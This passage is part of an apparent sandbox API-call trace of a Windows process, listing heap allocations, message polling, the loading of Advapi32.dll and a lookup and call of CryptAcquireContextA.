Size=0xc) returned 0x2e50698 [0147.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0147.447] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0147.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0147.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0147.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0147.448] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0147.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0147.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0147.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0147.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0147.448] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0147.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0147.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0147.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0147.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0147.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0147.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0147.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0147.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0147.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0147.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0147.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0147.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0147.449] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0147.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0147.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0147.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0147.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0147.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0147.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0147.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0147.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0147.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0147.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0147.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0147.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0147.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0147.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0147.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0147.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0147.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0147.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0147.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0147.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0147.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0147.450] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0147.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0147.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0147.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0147.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0147.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0147.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0147.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0147.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0147.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0147.450] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0147.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0147.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0147.451] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0147.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0147.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0147.451] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0147.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0147.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0147.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0147.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0147.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0147.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0147.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0147.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0147.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0147.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0147.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0147.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0147.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0147.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0147.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0147.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0147.451] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0147.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0147.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0147.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0147.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0147.452] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0147.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0147.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0147.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0147.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0147.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0147.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0147.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0147.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0147.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0147.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0147.452] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0147.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0147.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0147.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0147.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0147.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0147.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0147.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0147.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0147.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0147.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0147.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0147.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0147.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0147.453] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0147.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0147.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0147.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0147.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0147.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0147.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0147.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0147.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0147.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0147.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0147.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0147.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0147.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0147.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0147.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0147.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0147.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0147.453] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0147.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0147.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0147.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0147.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0147.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0147.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0147.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0147.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0147.454] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0147.454] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0147.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0147.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0147.454] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0147.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0147.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0147.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0147.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0147.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0147.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0147.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0147.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0147.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0147.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0147.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0147.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0147.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0147.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0147.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0147.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0147.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0147.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0147.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0147.455] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0147.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0147.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0147.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0147.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0147.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0147.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0147.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0147.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0147.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0147.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0147.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0147.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0147.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0147.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0147.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0147.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0147.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0147.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0147.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0147.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0147.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0147.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0147.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0147.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0147.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0147.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0147.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69bc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0147.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0147.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0147.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0147.457] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0147.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0147.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0147.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0147.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0147.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0147.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0147.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0147.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e698c8 [0147.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e698c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0147.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0147.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0147.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0147.458] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0147.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0147.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0147.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0147.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0147.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0147.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0147.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0147.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0147.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0147.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0147.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0147.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0147.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0147.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0147.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0147.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0147.458] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0147.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0147.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0147.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0147.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0147.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0147.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0147.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0147.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 